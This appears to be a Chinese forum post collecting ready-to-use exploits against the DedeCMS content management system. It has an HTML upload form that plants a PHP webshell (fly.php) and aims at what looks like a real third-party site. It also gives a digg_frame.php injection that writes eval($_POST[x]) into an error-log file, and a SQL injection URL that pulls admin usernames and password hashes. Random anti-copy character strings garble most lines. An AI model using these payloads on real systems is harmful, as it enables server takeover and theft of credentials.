# I+ ]! s3 v8 P0 r M: o+ ^7 ^7 h$ \ @/ A' q, @7 `% k
9 n& c P# s8 I* V" a4 G9 i# u& M
) b( ^/ v$ B( R% G5 U) R1 d( p3 Q& q0 o7 T, E$ D. t u# p8 ~ r
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞5 ]% I( n7 O( N
<html> d% u" P5 l. W( {8 f9 }* S/ E
<head>6 e0 ?2 [6 e. S7 v6 P2 m6 Q
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>1 b3 P6 }# y! R" y' r
</head>
6 G' {. i5 T3 M: @" W<body style="FONT-SIZE: 9pt">
% r3 M5 S c* D( W: ?---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />. N- y% V3 A0 a: E/ G7 c( [
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
?) X+ F: U1 A1 T' f K<input type='hidden' name='activepath' value='/data/cache/' />
' D4 O. y9 R+ D- e<input type='hidden' name='cfg_basedir' value='../../' />) w% t& ?8 E9 c; z: t3 C
<input type='hidden' name='cfg_imgtype' value='php' />. ^% i& _& D4 w7 M0 N2 M9 m
<input type='hidden' name='cfg_not_allowall' value='txt' />
4 y/ }* [5 e; E E<input type='hidden' name='cfg_softtype' value='php' />& c. }. C( Q! d8 x3 z5 W
<input type='hidden' name='cfg_mediatype' value='php' />
E, ]& Q9 @, u8 c8 u7 }9 ~' R<input type='hidden' name='f' value='form1.enclosure' />
! K$ D9 O* B0 w; G7 F+ w<input type='hidden' name='job' value='upload' />% A! |5 z X3 y4 d2 Y2 H8 d* x
<input type='hidden' name='newname' value='fly.php' />% _' ^% l: O+ b; q/ R- s; [
Select U Shell <input type='file' name='uploadfile' size='25' />" Z+ v3 p+ p3 p2 ^; N4 x
<input type='submit' name='sb1' value='确定' />( E+ ~8 S& \/ U2 N& L
</form>( j$ S8 Q& j$ u: L
<br />It's just a exp for the bug of Dedecms V55...<br />* y4 s& W' n& `5 d0 ]) }
Need register_globals = on...<br />/ {. v9 u3 H4 \& P' V. k0 X) }
Fun the game,get a webshell at /data/cache/fly.php...<br />
+ v+ o0 E' f0 Z+ y4 F+ n* F' D% l5 u</body>' E4 e8 w3 y/ K; i; K& d f$ l
</html>* W& D/ m3 q/ R P( l1 X
* I/ I* s7 m" h. j) h# s3 b+ ]4 ]' {( S" D2 e# l( K
3 Y% P, J. v" K3 N m6 |, P6 m6 M
. K# p) T& @4 m9 c) ?- A
" f( i1 A M+ q5 I2 j. n
o) H5 ]) H5 A& ~$ P: B" I! V2 g5 t# l
) M/ `$ t1 j6 k& o/ F- P/ p4 m+ q7 m; M+ w) z3 ]! m
. _# a6 D( }0 S/ T, C' B织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞% \% R5 J/ s2 D$ @- o8 B
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
1 O. o% g0 U2 H. t7 m/ V7 t4 G1. 访问网址:( k0 q' u6 b" O
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
% ]) N( {$ e4 \' @3 P5 |可看见错误信息! Q" J+ s' W/ h$ A! N# G
& l# h6 l1 O% A+ z6 x
- M8 E' C# \' Z" Q" ~
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
: S' b) [* w: n, A4 qint(3) Error: Illegal double '1024e1024' value found during parsing, n& r" d' Y$ R5 m4 D* d; i1 e
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>& Y1 A2 @7 A/ J- H4 Z( ?" ?, B$ ]
: O* N" ?( [5 Q5 M& q' i# U# I
6 Y! d0 Y9 Q# S9 D7 b3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
" ?. }( |8 T* L5 c& O G/ G: h; a M, v* _
& o: t9 `! r+ F<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>6 n9 G3 k! D! v( O
$ r" M. U( f X5 m! G7 i! R: j0 n. V5 R7 \
按确定后的看到第2步骤的信息表示文件木马上传成功.
. K/ c+ X9 t/ ~% l! p9 T8 p
$ C2 B6 P" e; }8 c |- T
7 o' l* a2 e# z3 h, T% ?- ^9 a0 F9 {; S& u' s# ]! }: r- }7 H
6 Z, ~) z- {5 `* ?
( {. f% s6 W- J2 I4 h
" z2 s3 U; ]% n- ] B3 h' d9 [& n
& E2 i8 W3 x# \, w5 h$ S& [ W v0 ^4 f0 ?4 b% ~. Y
0 @- e9 Z9 s7 |9 X+ C) m- u$ k/ M' \0 ]" l% n
0 j4 d& D' V& z& x1 \0 c, I4 F7 K6 ]" f
织梦(DedeCms)plus/infosearch.php 文件注入漏洞) i3 b( R6 w. d# u7 }
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对